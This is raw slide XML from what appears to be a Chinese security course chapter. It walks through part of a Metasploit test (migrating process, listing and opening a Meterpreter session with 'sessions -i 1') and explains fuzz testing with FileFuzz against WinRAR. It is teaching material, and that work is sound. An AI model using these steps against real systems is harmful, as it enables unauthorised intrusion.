              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击在网络横行的时代，安全防护软件能起到重要保护作用。仅以此次的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挂马攻击来说，所有安装了电脑管家的用户均能对攻击进行拦截。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="71876453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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、系统返回“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uccessfully migrated to process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，漏洞渗透测试成功，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460436" y="6264455"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞渗透测试成功</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1"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7409" name="Picture 1" descr="QQ截图20120520110248"/>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460436" y="3381555"/>
            <a:ext cx="5270500" cy="28829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77642314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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、输入命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>essions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们看到有一个会话，会话的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460436" y="6264455"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Session</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1"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8433" name="Picture 1" descr="QQ截图20120520110600"/>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460435" y="3318055"/>
            <a:ext cx="5270500" cy="29464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49459826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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、输入命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>essions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开这个会话。这时，我们已经进入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>eterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460436" y="6264455"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Session</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1"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9457" name="Picture 1" descr="QQ截图20120520110816"/>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460436" y="3406955"/>
            <a:ext cx="5270500" cy="28575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55133942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8.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件安全性分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件产品安全性综合测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="58169912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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试是一种特殊的黑盒测试，与基于功能性的测试有所不同，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的主要目的是进行攻击与渗透实验。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的测试用例往往是带有攻击性的畸形数据，用以触发各种类型的漏洞，可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>理解为一种能自动进行攻击尝试的工具，它往往可以触发一个缓冲区溢出漏洞，但却不能实现有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，测试人员需要实时地捕捉目标程序抛出的异常、发生的崩溃和寄存器等信息，综合判断这些错误是不是真正可以利用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>富有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经验的测试人员能够利用这种方法攻击大多数程序，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的优点是很少出现误报，能够迅速地找到真正的漏洞，缺点是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>永远不能保证系统里不存在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="133061193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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它们的共同点就是用文件作为程序的主要输入。从本质上说，这些软件都是按照实现约定好的数据结构对文件中不同数据域进行解析，以决定用什么颜色、在什么位置显示这些数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不少程序员会存在这样的惯性思维，即假设他们所使用的文件是严格遵守软件规定的数据格式的，这个假设在普通用户的使用过程中似乎没有什么不妥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>毕竟用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件一般不会存在什么非法数据。但是攻击者往往会挑战程序员的既定假设，尝试对软件所约定的数据格式进行稍许修改，观察软件在解析这种“畸形文件”时是否会发生错误，发生什么样的错误，堆栈是否能被溢出等。文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是这种利用“畸形文件”测试软件鲁棒性的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="201715318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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，主界面如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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025"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645564" y="3473724"/>
            <a:ext cx="2900245" cy="3066223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645564" y="6480312"/>
            <a:ext cx="2900245" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-17 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>FileFuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="103615989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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
